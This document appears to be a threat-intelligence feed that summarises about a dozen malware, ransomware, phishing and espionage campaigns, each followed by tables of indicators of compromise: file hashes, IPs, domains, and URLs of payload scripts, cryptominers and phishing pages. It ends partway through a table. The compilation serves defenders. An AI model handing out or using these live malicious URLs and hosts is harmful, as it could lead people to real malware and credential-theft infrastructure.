A large-scale cyber espionage campaign targeting Kurdish websites was uncovered, involving 25 compromised sites using four variants of malicious scripts. The attacks ranged from simple location tracking to prompting users to install malicious Android apps. Despite lacking sophisticated techniques, the campaign's scale and duration were notable, operating undetected since late 2022. The compromised sites were linked to Kurdish media, political organizations, and the Rojava administration in Syria. A malicious Android app disguised as a news app was also discovered, capable of exfiltrating user data. While attribution remains uncertain, potential actors include Turkish intelligence, Syrian government, or the Kurdistan Regional Government of Iraq. |
Type |
Indicator |
FileHash-MD5 |
7ff9e87f8c8ea10e6aa688c491c81283 |
FileHash-SHA1 |
6c75d5f31fe386a1ec94b85cfb7f873b2e100062 |
FileHash-SHA256 |
2d75110d4c227c59b9c8fb02cc54b99d0b41e33a2fe1ad50e2fdf0cfb1e701d5 |
IPv4 |
170.75.161.102 |
IPv4 |
23.95.14.63 |
IPv4 |
24.246.223.228 |
URL |
http://170.75.161.102/asd.js |
URL |
http://rojnews.news/wp-includes/sitemaps/ |
URL |
http://ronahi.video/wo_cookie.php |
URL |
http://ronahi.video/wo_cookies.php |
URL |
http://webmail.onlinearuba.net/7b2[redacted]600a/logs.php |
URL |
https://rojnews.news/ku/wp-content/mobile.html |
URL |
https://targetplatform.net/mobile.html |
domain |
ciwanensoresger.com |
domain |
dicle.fm |
domain |
dirbesiye.fm |
domain |
halkin-dg.com |
domain |
hbdh.info |
domain |
init4afrin.org |
domain |
kongra-star.org |
domain |
leftkup.com |
domain |
lekolin.org |
domain |
nuceciwan129.xyz |
domain |
orkesfm.com |
domain |
pajk.org |
domain |
ronahi.net |
domain |
ronahi.video |
domain |
sdf-press.com |
domain |
sehidenrojava.com |
domain |
star-fm.net |
domain |
targetplatform.net |
domain |
tev-dem.com |
domain |
thkp-c.org |
domain |
ypj-office.com |
domain |
ypjrojava.net |
domain |
yra-ufm.com |
domain |
zindi24.com |
hostname |
webmail.onlinearuba.net |
YARA |
fd8e25d1e0865fc8a7fb33fa1797fa1a4f4ce88e |
YARA |
936ac199159f316087973a74e1fe9b155868ae83 |
YARA |
02a8dd33b54ec801ad073001e2d384ee9da98dbb |
YARA |
d4f3cad0a5fb11f974b37c1d2b8b3a1db46205f5 |
YARA |
23c7b8bd11b06151c643982dc7fb5a34278c46ec |
YARA |
e1e6e66c027890b03eccd00c4730f61fdb3d3c6d |
YARA |
21af2ccd18add5f947bbd0684012b63e58beb4a1 |
|
European Banks Already Under Attack by New Malware Variant |
A new version of the Octo malware, named Octo2, has emerged as a significant threat to European banks. This variant builds upon the capabilities of its predecessor, which was already a dominant force in mobile malware. Octo2 features improved remote access capabilities, sophisticated obfuscation techniques, and a Domain Generation Algorithm (DGA) for communication with command and control servers. Initial campaigns have been observed in Italy, Poland, Moldova, and Hungary, targeting banking applications. The malware's developers have focused on enhancing stability for Device Takeover attacks and implementing advanced anti-detection measures. With the original Octo source code leaked, Octo2 represents an escalation in the mobile threat landscape, posing increased risks to mobile banking security worldwide. |
Type |
Indicator |
FileHash-MD5 |
11cb1b221952268fcd6000e563752d79 |
FileHash-MD5 |
c508d432e3d521acaa6215934f609b2a |
FileHash-MD5 |
e32eeea3676874431571f976d044a816 |
FileHash-SHA1 |
5e44ba99e81c6673b000519755e041c2d4082ae8 |
FileHash-SHA1 |
d40169c63e74d86cc0d02c638401bcd9ccdb621b |
FileHash-SHA1 |
d4a85997999a975848b60fd52597538baf652daf |
FileHash-SHA256 |
117aa133d19ea84a4de87128f16384ae0477f3ee9dd3e43037e102d7039c79d9 |
FileHash-SHA256 |
6cd0fbfb088a95b239e42d139e27354abeb08c6788b6083962943522a870cb98 |
FileHash-SHA256 |
83eea636c3f04ff1b46963680eb4bac7177e77bbc40b0d3426f5cf66a0c647ae |
|
BlackSuit Ransomware |
The report meticulously chronicles a sophisticated intrusion which began in December 2023 and culminated in the deployment of BlackSuit ransomware approximately 15 days later. The threat actor demonstrated an array of tactics, leveraging tools like Cobalt Strike, Sharphound, and SystemBC, alongside built-in Windows utilities, to establish a persistent foothold, exfiltrate data, and ultimately encrypt systems for financial gain. The investigation revealed the use of various obfuscation techniques, including process injection, proxy servers, and malleable command-and-control infrastructure, highlighting the actor's determination to evade detection. |
Type |
Indicator |
FileHash-MD5 |
0bb61c0cff022e73b7c29dd6f1ccf0e2 |
FileHash-MD5 |
1b2b0fc8f126084d18c48b4f458c798b |
FileHash-MD5 |
3900ebc7766f3894fb1eb300460376ad |
FileHash-MD5 |
3bf1142b3294c23852852053135ec0df |
FileHash-MD5 |
519dc779533b4ff0fc67727fecadba82 |
FileHash-MD5 |
6015e6e85d0d93e60041fa68c6a89776 |
FileHash-MD5 |
76a2363d509cc7174c4abee9a7d7ae68 |
FileHash-MD5 |
820cfde780306e759bb434da509f7a91 |
FileHash-MD5 |
b54240c98ca23202e58a1580135ad14c |
FileHash-MD5 |
bed5688a4a2b5ea6984115b458755e90 |
FileHash-MD5 |
d66000edfed0a9938162b2b453ffa516 |
FileHash-MD5 |
ecc488e51fbb2e01a7aac2b35d5f10bd |
FileHash-MD5 |
ed44877077716103973cbbebd531f38e |
FileHash-MD5 |
f34d5f2d4577ed6d9ceec516c1f5a744 |
FileHash-SHA1 |
286588a50b9b128d07aa0f8851f2d7ee91dfa372 |
FileHash-SHA1 |
2bb6c8b6461edc49e22f3d0c7dc45904b2ed8a2b |
FileHash-SHA1 |
4e38b98965a4d4756e6f4a8259df62cbca7de559 |
FileHash-SHA1 |
586ea19ea4776300962e20cfc9e7017a50888ecb |
FileHash-SHA1 |
8dde03600a18a819b080a41effc24f42fa960a3e |
FileHash-SHA1 |
a3b617eb4248aba34c28c48886116ac97e55e932 |
FileHash-SHA1 |
cd55256904f1964b90b51089b46f1a933fec3e8e |
FileHash-SHA1 |
ceb8c699a57193aa3be2a1766b03050cde3c738a |
FileHash-SHA1 |
e63732fb38d2e823348529a264b4c4718e0c0b4a |
FileHash-SHA256 |
27e300fa67828d8ffd72d0325c6957ff54d2dc6a060bbf6fc7aa5965513468e0 |
FileHash-SHA256 |
3b873bc8c7ee12fe879ab175d439b5968c8803fbb92e414de39176e2371896b2 |
FileHash-SHA256 |
55cde638e9bcc335c79c605a564419819abf5d569c128b95b005b2f48ccc43c1 |
FileHash-SHA256 |
60dcbfb30802e7f4c37c9cdfc04ddb411060918d19e5b309a5be6b4a73c8b18a |
FileHash-SHA256 |
6c884e4a9962441155af0ac8e7eea4ac84b1a8e71faee0beafc4dd95c4e4753f |
FileHash-SHA256 |
9493b512d7d15510ebee5b300c55b67f9f2ff1dda64bddc99ba8ba5024113300 |
FileHash-SHA256 |
a39dc30bd672b66dc400f4633dfa4bdd289b5e79909c2e25e9c08b44d99b8953 |
FileHash-SHA256 |
e92912153cf82e70d52203a1a5c996e68b7753818c831ac7415aedbe6f3f007d |
FileHash-SHA256 |
f474241a5d082500be84a62f013bc2ac5cde7f18b50bf9bb127e52bf282fffbf |
domain |
svchorst.com |
hostname |
as.regsvcast.com |
hostname |
qw.regsvcast.com |
hostname |
wq.regsvcast.com |
hostname |
zx.regsvcast.com |
|
Analysis of the BlackJack group: techniques, tools, and similarities with Twelve |
The report examines the BlackJack hacktivist group targeting Russian organizations, focusing on their tools, techniques, and connections to the Twelve group. BlackJack employs freely available software like the Shamoon wiper and LockBit ransomware. Significant overlaps with Twelve include similar malware samples, identical file paths, and shared tactics. Both groups use network directories for malware distribution and scheduled tasks for execution. The analysis reveals a potential unified cluster of hacktivist activity against Russian targets, with no financial motives but aiming to cause maximum damage through data encryption, deletion, and theft. |
Type |
Indicator |
FileHash-MD5 |
39b91f5dfbbec13a3ec7cce670cf69ad |
FileHash-MD5 |
5f88a76f52b470dc8e72bba56f7d7bb2 |
FileHash-MD5 |
646a228c774409c285c256a8faa49bde |
FileHash-MD5 |
bf402251745df3f065ebe2ffdec9a777 |
FileHash-MD5 |
da30f54a3a14ad17957c88bf638d3436 |
FileHash-MD5 |
ed5815ddad8188c198e0e52114173cb6 |
FileHash-SHA1 |
19ec859708e58b1275ee1bdb48aa1966757266d0 |
FileHash-SHA256 |
535e0dbd97cb9ea66f375400b550dd3bcad0788a89fb46996a651053a2df07c3 |
|
Threat Actors leverage Docker Swarm and Kubernetes to mine cryptocurrency at scale |
A new cryptojacking campaign targeting Docker Engine API has been discovered, with the ability to move laterally to Docker Swarm, Kubernetes, and SSH servers. The attackers exploit exposed Docker API endpoints to deploy cryptocurrency miners and additional malicious payloads. They utilize Docker Hub to host malicious images and leverage Docker Swarm's orchestration features for command and control purposes. The campaign employs various techniques for lateral movement, persistence, and evasion, including manipulating Docker Swarm, exploiting Kubernetes' kubelet API, and installing backdoors. While some indicators suggest a possible link to TeamTNT, there is insufficient evidence for definitive attribution. |
Type |
Indicator |
URL |
http://45.9.148.35/aws |
IPv4 |
164.68.106.96 |
FileHash-MD5 |
e10e3934d7659e00cc7f47b569af9ff5 |
FileHash-SHA1 |
02b71d23d5b26008dfb54a52fc3160b9e7f1296c |
FileHash-SHA256 |
c5391314ce789ff28195858a126c8a10a4f9216e8bd1a8ef71d11c85c4f5175c |
FileHash-MD5 |
154c26c9ddc84930f2acd899cd182916 |
FileHash-MD5 |
b62ce36054a7e024376b98df7911a5a7 |
FileHash-SHA1 |
efc0142857d1d8ee454286fb1b4587dad6762e0c |
FileHash-SHA256 |
0af1b8cd042b6e2972c8ef43d98c0a0642047ec89493d315909629bcf185dffd |
FileHash-SHA256 |
2514e5233c512803eff99d4e16821ecc3b80cd5983e743fb25aa1bcc17c77c79 |
FileHash-SHA256 |
505237e566b9e8f4a83edbe45986bbe0e893c1ca4c5837c97c6c4700cfa0930a |
FileHash-SHA256 |
6157a74926cfd66b959d036b1725a63c704b76af33f59591c15fbf85917f76fa |
FileHash-SHA256 |
6f426065e502e40da89bbc8295e9ca039f28b50e531b33293cee1928fd971936 |
FileHash-SHA256 |
700635abe402248ccf3ca339195b53701d989adb6e34c014b92909a2a1d5a0ff |
FileHash-SHA256 |
78ebc26741fc6bba0781c6743c0a3d3d296613cc8a2bce56ef46d9bf603c7264 |
FileHash-SHA256 |
9d02707b895728b4229abd863aa6967d67cd8ce302b30dbcd946959e719842ad |
FileHash-SHA256 |
d99bd3a62188213894684d8f9b4f39dbf1453cc7707bac7f7b8f484d113534b0 |
FileHash-SHA256 |
e4c4400a4317a193f49c0c53888ec2f27e20b276c2e6ee1a5fd6eacf3f2a0214 |
FileHash-SHA256 |
e6985878b938bd1fba3e9ddf097ba1419ff6d77c3026abdd621504f5c4186441 |
IPv4 |
192.155.94.199 |
IPv4 |
45.9.148.35 |
URL |
http://192.155.94.199/sh/xmr.sh.sh |
URL |
http://solscan.live/bin/zgrab |
URL |
http://solscan.live/chimaera/sh/init.sh |
URL |
http://solscan.live/sh/init.sh |
URL |
https://solscan.live/aws.sh |
URL |
https://solscan.live/bin/64bit/xmrig |
URL |
https://solscan.live/bin/pnscan_1.12+git20180612.orig.tar.gz |
URL |
https://solscan.live/bin/xmr/x86_64 |
URL |
https://solscan.live/bin/xmrig |
URL |
https://solscan.live/data/docker.container.local.spread.txt |
URL |
https://solscan.live/scan_threads.dat |
URL |
https://solscan.live/sh/init.sh |
URL |
https://solscan.live/sh/kube.lateral.sh |
URL |
https://solscan.live/sh/search.sh |
URL |
https://solscan.live/sh/setup_xmr.sh |
URL |
https://solscan.live/sh/spread_docker_local.sh |
URL |
https://solscan.live/sh/spread_kube_loop.sh |
URL |
https://solscan.live/sh/spread_ssh.sh |
URL |
https://solscan.live/sh/xmr.sh.sh |
URL |
https://solscan.live/so/xmrig.so |
URL |
https://solscan.live/upload.php |
domain |
borg.wtf |
domain |
solscan.live |
hostname |
x.solscan.live |
URL |
https://solscan.live/up/kube_in.php |
|
Iranian backed group steps up phishing campaigns against Israel, U.S. |
An Iranian government-backed threat group known as APT42 has significantly intensified its phishing campaigns targeting high-profile individuals in Israel and the United States over the past six months. The group, associated with Iran's Islamic Revolutionary Guard Corps, has focused on current and former government officials, political campaigns, diplomats, think tanks, NGOs, and academic institutions involved in foreign policy discussions. APT42's activities demonstrate a concerted effort to rapidly shift its operational priorities in line with Iran's political and military objectives. |
Type |
Indicator |
FileHash-MD5 |
157284a93f3c5f488f4559db3537daea |
FileHash-MD5 |
1cea34e748cc43cdc7724684cebf409f |
FileHash-MD5 |
39556dc87f9a24405e73e6dd46d34bc7 |
FileHash-MD5 |
6c033c2cbeff71f7d17be4628c7e59f5 |
FileHash-MD5 |
b6f02f67e2b5d2c81bc502d24258a1d5 |
FileHash-SHA1 |
5a892c6cf26f90220d279d878206bf73f933f4dc |
FileHash-SHA1 |
7e564f5f6bb98f629789565a737738ea66330f74 |
FileHash-SHA1 |
ca06b5b530c5c9fc09b12b1c8c48f8aeca4c3452 |
FileHash-SHA1 |
cce4761750a2549dc5bb7e377717dd4ea40420e5 |
FileHash-SHA1 |
e8ce99f3b7c5163fc8ab793a7dcfbe2cdf1a21a7 |
FileHash-SHA256 |
0180f4f29c550aa1ffaa21af51711b29de99fb1d7c932d008a0e9356ae8a7d60 |
FileHash-SHA256 |
33a61ff123713da26f45b399a9828e29ad25fbda7e8994c954d714375ef92156 |
FileHash-SHA256 |
4ac088bf25d153ec2b9402377695b15a28019dc8087d98bd34e10fed3424125f |
FileHash-SHA256 |
82ae2eb470a5a16ca39ec84b387294eaa3ae82e5ada4b252470c1281e1f31c0a |
FileHash-SHA256 |
89c1d1b61d7f863f8a651726e29f2ae3de7958f36b49a756069021817947d06c |
FileHash-SHA256 |
baac058ddfc96c8aea8c0057077505f0ad3ff20311d999886fed549924404849 |
FileHash-SHA256 |
bc2597ce09987022ff0498c6710a9b51a1a47ed8082ac044be2838b384157527 |
FileHash-SHA256 |
c3486133783379e13ed37c45dc6645cbee4c1c6e62e7988722931eef99c8eaf3 |
FileHash-SHA256 |
c67cd544a112cab1bb75b3c44df4caf2045ef0af51de9ece11261d6c504add32 |
FileHash-SHA256 |
f83e2b3be2e6db20806a4b9b216edc7508fa81ce60bf59436d53d3ae435b6060 |
URL |
http://check-pabnel-status.live/Gcollection/Password |
URL |
http://check-pabnel-status.live/Gcollection/Ref/CkliPwaM |
URL |
http://check-pabnel-status.live/Lcollection/Password |
URL |
http://check-pabnel-status.live/Lcollection/Ref/F53OQQkE |
URL |
http://checking-paneling.live/aliasauthG/Password |
URL |
http://checking-paneling.live/aliasauthG/autoref/vNSX6c2m |
URL |
http://click-choose-figured.cfd/Gallery/Password |
URL |
http://click-choose-figured.cfd/Gallery/Ref/FSaEM5gG |
URL |
http://panel-short-check.live/PhyfkFQX |
URL |
http://panel-short-check.live/ZZqt3LYD |
URL |
http://s3api.shop/api/ |
URL |
http://sharedrive.webredirect.org/Khn/shoaGzA/cGNt/dMPaV/kvvhK |
URL |
http://short-ion-per.live/08EFNZ1 |
URL |
http://smaaaal.cfd/Wp59tqKU |
domain |
accredit-navigation.online |
domain |
brookings.email |
domain |
check-pabnel-status.live |
domain |
checking-paneling.live |
domain |
click-choose-figured.cfd |
domain |
panel-short-check.live |
domain |
s3api.shop |
domain |
short-ion-per.live |
domain |
smaaaal.cfd |
domain |
understandingthewar.org |
hostname |
sharedrive.webredirect.org |
hostname |
visioneditor.loseyourip.com |
|
Investigating Infrastructure and Tactics of Phishing-as-a-Service Platform Sniper Dz |
Unit42 explores Sniper Dz, a popular phishing-as-a-service (PhaaS) platform targeting social media and online services. Over 140,000 phishing websites associated with Sniper Dz were identified in the past year. The platform offers an admin panel with phishing page catalogs, allowing users to host on Sniper Dz infrastructure or download templates. Surprisingly, services are free, likely because Sniper Dz collects stolen credentials. The platform uses public proxy servers to hide phishing content, obfuscates code, and employs centralized infrastructure for credential exfiltration and victim tracking. Sniper Dz abuses legitimate SaaS platforms, particularly Blogspot, and uses brand names or trends as keywords in hostnames. After credential theft, victims may be redirected to malicious advertisements or potentially unwanted applications. |
Type |
Indicator |
URL |
http://proxymesh.com/web/index.php |
URL |
http://raviral.com/host_style/style/js-track/track.js |
URL |
http://raviral.com/k_fac.php |
domain |
raviral.com |
hostname |
pro.riccardomalisano.com |
URL |
http://pro.riccardomalisano.com/about/z1to.html |
URL |
http://pro.riccardomalisano.com/about/z2to.html |
|
Security Brief: Actor Uses Compromised Accounts, Customized Social Engineering to Target Transport and Logistics Firms with Malware |
A threat actor is targeting transportation and logistics companies in North America with malware campaigns. The actor uses compromised email accounts to inject malicious content into existing conversations, making messages appear legitimate. Campaigns primarily deliver Lumma Stealer, StealC, NetSupport, DanaBot, and Arechclient2 malware. The actor employs Google Drive URLs, .URL files, and SMB for malware delivery, and recently adopted the 'ClickFix' technique. Campaigns are small-scale and highly targeted, with lures impersonating industry-specific software. The activity is believed to be financially motivated and aligns with a trend of sophisticated social engineering combined with commodity malware use in the cybercriminal landscape. |
Type |
Indicator |
FileHash-MD5 |
1ce8e7f90707058eec8757de0deaa76e |
FileHash-MD5 |
6bc398dba59c8d162ee858b7b199f81d |
FileHash-SHA1 |
6fdb6f50f4ad693c64b72a76a970fc93916b3655 |
FileHash-SHA1 |
d2e45018a2428d8b7729a75836499a4f55cdbcdf |
FileHash-SHA256 |
0931217eb498b677e2558fd30d92169cc824914c2df68cfbcff4f642600e2cc2 |
FileHash-SHA256 |
163dccdcaa7fdde864573f2aabe0b9cb3fdcdc6785f422f5c2ee71ae6c0e413a |
FileHash-SHA256 |
199d6f70f10c259ee09e99e6f1d7f127426999a0ed20536f2662842cd12b5431 |
FileHash-SHA256 |
1a002631b9b2e685aeb51e8b6f4409daf9bc0159cfd54ef9ad3ba69d651ac2a3 |
FileHash-SHA256 |
2436fe37d25712b68b2e1a9805825bcf5073efb91588c1b5193ba446d1edd319 |
FileHash-SHA256 |
37f328fc723b2ddf0e7a20b57257cdb29fe9286cb4ffeaac9253cb3b86520235 |
FileHash-SHA256 |
582c69b52d68b513f2a137bbf14704df7d787b06752333fc31066669cd663d04 |
FileHash-SHA256 |
8fe96fb9d820db0072fe0423c13d2d05f81a9cf0fdd6f4e2ee78dc4ca1d37618 |
FileHash-SHA256 |
957fe77d04e04ff69fdaff8ef60ac0de24c9eb5e6186b3187460eac6be561f5d |
FileHash-SHA256 |
ac49ff207e319f79bbd9c80d044d621920d1340f4c53e5e4da39b2a0c758634e |
FileHash-SHA256 |
b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86 |
FileHash-SHA256 |
cdf160c63f61ae834670fdaf040411511dc2fc0246292603e7aa8cd742d78013 |
FileHash-SHA256 |
d45b6b04ac18ef566ac0ecdaf6a1f73d1c3164a845b83e0899c66c608154b93d |
FileHash-SHA256 |
e5ed1a273faf5174dbd8db9d6d3657b81dc2cbc2e0af28cfe76f41c3d2f2fc37 |
FileHash-SHA256 |
e7526dadae6b589b6a31f1f7e2e528ed1c9edd9f3d1ca88f0ece0dee349d3842 |
FileHash-SHA256 |
f8b12e6d02ea5914e01f95b5665b3a735acfbb9ee6ae27b004af37547bc11e7f |
FileHash-SHA256 |
fddacfe9e490250e62f7f30b944fcbe122e87547d01c4a906401049304c395f7 |
IPv4 |
185.217.197.84 |
IPv4 |
89.23.98.98 |
domain |
ambccm.com |
domain |
ambcrrm.com |
domain |
idessit.com |
domain |
live-samsaratrucking.com |
|
Analysis of APT-C-00 (OceanLotus) Double Loader and Related VMP Loader |
The report discusses recent attacks by APT-C-00 (OceanLotus), a state-sponsored hacking group. It analyzes two types of loaders used in their 2024 campaigns: a double loader and a VMP-protected version. The double loader consists of two modules: an MSVC DLL for initial information gathering and a GoLang DLL for payload execution. The VMP loader is a protected version of the double loader, using VMProtect 3.XX x64 to enhance its resistance to analysis. Both loaders ultimately deploy CobaltStrike Beacon modules with different C2 servers. The report highlights the group's use of various programming languages and false flag operations to complicate attribution. |
Type |
Indicator |
FileHash-MD5 |
2109479e62f3c45bab00768553b158b8 |
FileHash-MD5 |
26669891d83b8a706d2c0af91292247c |
FileHash-MD5 |
4a8756b22029a88506744ab7864c9b83 |
FileHash-MD5 |
4ce5ea38c4d486bed7f6d9e9208133c6 |
FileHash-MD5 |
9ad37ce054ca1523d26bb49fbc80dff6 |
FileHash-MD5 |
d21c4b1c1db2c9f443c4ba271f738c91 |
IPv4 |
64.176.58.16 |
|
Kryptina RaaS - From Unsellable Cast-Off to Enterprise Ransomware |
This analysis examines the evolution of Kryptina, a ransomware-as-a-service platform, from a free tool on public forums to being actively used in enterprise attacks under the Mallox ransomware family. In May 2024, a Mallox affiliate leaked staging server data, revealing their Linux ransomware was based on a modified version of Kryptina. The affiliate made superficial changes to source code and documentation, removing Kryptina branding but retaining core functionality. This adoption exemplifies the commoditization of ransomware tools, complicating malware tracking as affiliates blend different codebases into new variants. The report details the similarities and differences between the original Kryptina RaaS and the modified Mallox version, including encryption methods, ransom note templates, and configuration files. |
Type |
Indicator |
FileHash-MD5 |
71efe7a21da183c407682261612afc0f |
FileHash-SHA1 |
0f1aea2cf0c9f2de55d2b920618a5948c5e5e119 |
FileHash-SHA256 |
45a236e7aa80515aafb6c656c758faad6e77fb435b35bfa407aef3918212078d |
CVE |
CVE-2024-21338 |
FileHash-MD5 |
1448ce8abc2f0184ec898d55f9c338b4 |
FileHash-MD5 |
193d2c42fea21defedbce498b5039272 |
FileHash-MD5 |
231478ff24055d5cdb5fbec36060c8ff |
FileHash-MD5 |
4825f3a92780be4a285583b0f24fed99 |
FileHash-MD5 |
51d51696c7f3a0e3fba4b8ceab210bac |
FileHash-MD5 |
5b0c1958a875c205951b88fd1c885900 |
FileHash-MD5 |
68785d476573955d50a3908dc18bf73b |
FileHash-MD5 |
6bb2752ea73b4d6a5c33f543b5c29461 |
FileHash-MD5 |
779aa15cd6a8d416e7f722331d87f47b |
FileHash-MD5 |
7f099845d8e6849d6ab4d64b546477d6 |
FileHash-MD5 |
846bb4f2cdbf9ed624ba2647c6b04101 |
FileHash-MD5 |
8d0fd41d35df82d3e7e2ff5c1747b87c |
FileHash-MD5 |
af1d24091758f1e02d51dc5f5297c932 |
FileHash-MD5 |
b0770b7f24a436d256f2d58fc8581a18 |
FileHash-MD5 |
b5b20e03ae941e9f21c444bd50225c41 |
FileHash-MD5 |
be08c3e95df5992903a69e04cbab22e3 |
FileHash-MD5 |
e9e087c52b97c7a3e343642379829e0a |
FileHash-SHA1 |
0b9d2895d29f7d553e5613266c2319e10afdda78 |
FileHash-SHA1 |
0bbd9a8ddbb68e2658ea4c0a4106c7406a392098 |
FileHash-SHA1 |
0de92527430dc0794694787678294509964422e6 |
FileHash-SHA1 |
0e83d023b9f6c34ab029206f1f11b3457171a30a |
FileHash-SHA1 |
0f632f8e59b8c8b99241d0fd5ff802f31a3650cd |
FileHash-SHA1 |
1379a1b08f938f9a53082150d53efadb2ad37ae5 |
FileHash-SHA1 |
16ec82ac2caf0c2e4812a636dbff4bd8ef84d5c3 |
FileHash-SHA1 |
21bacf8daa45717e87a39842ec33ad61d9d79cfe |
FileHash-SHA1 |
262497702d6b7f7d4af73a90cb7d0e930f9ec355 |
FileHash-SHA1 |
29936b1aa952a89905bf0f7b7053515fd72d8c5c |
FileHash-SHA1 |
2b3fc20c4521848f33edcf55ed3d508811c42861 |
FileHash-SHA1 |
341552a8650d2bdad5f3ec12e333e3153172ee66 |
FileHash-SHA1 |
43377911601247920dc15e9b22eda4c57cb9e743 |
FileHash-SHA1 |
55dc4541b72a804a7edf324d6a388569a68a2986 |
FileHash-SHA1 |
58552820ba2271e5c3a76b30bd3a07144232b9b3 |
FileHash-SHA1 |
5cf67c0a1fa06101232437bee5111fefcd8e2df4 |
FileHash-SHA1 |
66cab82b64fbb03fecf7ca7f9ed295404a9bfe2b |
FileHash-SHA1 |
78c27c7ac1da97dc822b4af7be5f15d68f9c5e4f |
FileHash-SHA1 |
88a039be03abc7305db724079e1a85810088f900 |
FileHash-SHA1 |
9050419cbecc88be7a06ea823e270db16f47c1ea |
FileHash-SHA1 |
93ef3578f9c3db304a979b0d9d36234396ec6ac9 |
FileHash-SHA1 |
a1a8922702ffa8c74aba9782cca90c939dfb15bf |
FileHash-SHA1 |
b07c725edb65a879d392cd961b4cb6a876e40e2d |
FileHash-SHA1 |
b27d291596cc890d283e0d3a3e08907c47e3d1cc |
FileHash-SHA1 |
b768ba3e6e03a77004539ae999bb2ae7b1f12c62 |
FileHash-SHA1 |
c20e8d536804cf97584eec93d9a89c09541155bc |
FileHash-SHA1 |
c4d988135e960e88e7acfae79a45c20e100984b6 |
FileHash-SHA1 |
d46fbc4a57dce813574ee312001eaad0aa4e52de |
FileHash-SHA1 |
d618a9655985c33e69a4713ebe39d473a4d58cde |
FileHash-SHA1 |
d94f890a8c92cbce50d89da2792bcfc24894c004 |
FileHash-SHA1 |
dc3f98dded6c1f1e363db6752c512e01ac9433f3 |
FileHash-SHA1 |
ee3cd3a749f5146cf6d4b36ee87913c51b9bfe93 |
FileHash-SHA1 |
ef2565c789316612d8103056cec25f77674d78d1 |
FileHash-SHA1 |
f17d9b3cd2ba1dea125d2e1a4aeafc6d4d8f12dc |
FileHash-SHA1 |
fbb89744bc9f65719bd5415dcf1ec9a74b24254e |
FileHash-SHA256 |
175e20a7c8d54bfa6271de9d550c25c21e1c91aaf39aaa80779389fc8600d53f |
FileHash-SHA256 |
23ba8078df63ebb313f2f2a2f24dab840e068ddd5cc54bb661db7d010954d2fc |
FileHash-SHA256 |
2fdaee89b426fa3ee00f3e8d10ebf23f1de1562746e5ba2ee606443572190610 |
FileHash-SHA256 |
3b1b1beacd0925dcb27675c45f50574921181c097ab8004d18bc116e5a99bde0 |
FileHash-SHA256 |
694eeec46cfe1b7acd54cf95b307416be984a5238b3059cc3af446e74e28d889 |
FileHash-SHA256 |
9195ad1b5c2d4b20b12958224c6913b6a7929c3c4d2648a552aa7dc92da9143b |
FileHash-SHA256 |
9f4c40c0d52291334d90455a64106f920ede3bda5c3f7d00b0933032b0f208d8 |
FileHash-SHA256 |
b7776fc59166d0fdafa0ff7ab867049512226b0d7302a3acd9532ab05e58d44b |
FileHash-SHA256 |
c23c25621872ef6a5f6a04dc1caf283a5efb3e046f6f721e96f661d28e3e6280 |
FileHash-SHA256 |
c714df0154f2b6fc8a82aa35281836c664bd3fbf4be3efc7e8b5b94ac87fc0a6 |
FileHash-SHA256 |
cd0f87f7df534b0e29b2ffa5d02cdef0d7db29a67a316e143554eb1945d75e6c |
FileHash-SHA256 |
e52a8d0337bae656b01cb76c03975ac3d75ac4984c028ba2a6531396dea6dddd |
FileHash-SHA256 |
e6d4e65c45700dcedd2b5ed73734328500b5f5a016d79440d3611092475b9e6e |
FileHash-SHA256 |
e9b9f425fa818899070f69d09d3a35d7ccc88de6ac98b2c8b02116f1b314bc78 |
FileHash-SHA256 |
ec1b3e6440b0fe1523295479fb18660aaac2f9f13a72145feebe07d60c2d9197 |
FileHash-SHA256 |
f4b64976d7dcb04466f0a89d81cd2eb158158c752c042ec248549415799965bf |
FileHash-SHA256 |
ff5e8c23e622bdaf6fd608691e6c3da298b0bfe867b0d8d84d37d991b75a237c |
IPv4 |
185.73.125.6 |
domain |
docs.md |
hostname |
grovik71.theweb.place |
|
How Ransomhub Ransomware Uses EDRKillShifter to Disable EDR and Antivirus Protections |
The RansomHub ransomware, attributed to a group tracked as Water Bakunawa, employs sophisticated anti-EDR techniques to evade security solutions. Its attack chain includes exploiting vulnerabilities like Zerologon, using EDRKillShifter to disable endpoint protection, and employing various evasion scripts. The ransomware targets multiple industries and critical infrastructure sectors, using spear-phishing for initial access. It utilizes tools like NetScan for network reconnaissance and AnyDesk for command and control. The attackers exfiltrate sensitive data using rclone before encrypting files and demanding ransom. The evolving tactics of RansomHub highlight the need for advanced, multi-layered security strategies to protect against modern ransomware threats. |
Type |
Indicator |
IPv4 |
82.147.85.52 |
FileHash-MD5 |
0cd57e68236aaa585af75e3be9d5df7d |
FileHash-MD5 |
407dcc63e6186f7acada055169b08d81 |
FileHash-MD5 |
57556d30b4d1e01d5c5ca2717a2c8281 |
FileHash-MD5 |
676259a72f3f770f8ad20b287d62071b |
FileHash-MD5 |
da3ba26033eb145ac916500725b7dfd5 |
FileHash-MD5 |
de8e14fdd3f385d7c6d34b181903849f |
FileHash-MD5 |
f17ceae8c5066608b5c87431bac405a9 |
FileHash-MD5 |
ff1eff0e0f1f2eabe1199ae71194e560 |
FileHash-SHA1 |
189c638388acd0189fe164cf81e455e41d9629d6 |
FileHash-SHA1 |
2d3a95e91449a366ccf56177a4542cc439635768 |
FileHash-SHA1 |
2e89cf3267c8724002c3c89be90874a22812efc6 |
FileHash-SHA1 |
3b035da6c69f9b05868ffe55d7a267d098c6f290 |
FileHash-SHA1 |
4c0d755f42902559d16b73ccc4511897f7bbce94 |
FileHash-SHA1 |
5f2c7da181a0ef32df5b9c8a10ea5b3135489021 |
FileHash-SHA1 |
6764ddb2e5b18bf5d0c621f3078d7ac72865c1c3 |
FileHash-SHA1 |
77daf77d9d2a08cc22981c004689b870f74544b5 |
FileHash-SHA1 |
86cdb729094c013e411ac9b4c72485a55a629e5d |
FileHash-SHA1 |
8de2d38d33294586b4758599fdf65f1a265e013b |
FileHash-SHA1 |
bcdb721d5be41a9d61bee20a458ae748e023238f |
FileHash-SHA1 |
de1241a592760cc1d850be8f41beebcd460b66ec |
FileHash-SHA1 |
e187d58f59e0444f7ef9ddefec88d2b11b96e734 |
FileHash-SHA1 |
e38082ae727aeaef4f241a1920150fdf6f149106 |
FileHash-SHA256 |
2d823c8b6076e932d696e8cb8a2c5c5df6d392526cba8e39b64c43635f683009 |
FileHash-SHA256 |
30abbbeedeeb268435899a7697f7a72f37a38e60ae2430e09bc029c7a8aa7001 |
FileHash-SHA256 |
46ff164e066a3a88dad76cad25c6ea42c7da6890bcba3fa3ccd4c6e93a3272d0 |
FileHash-SHA256 |
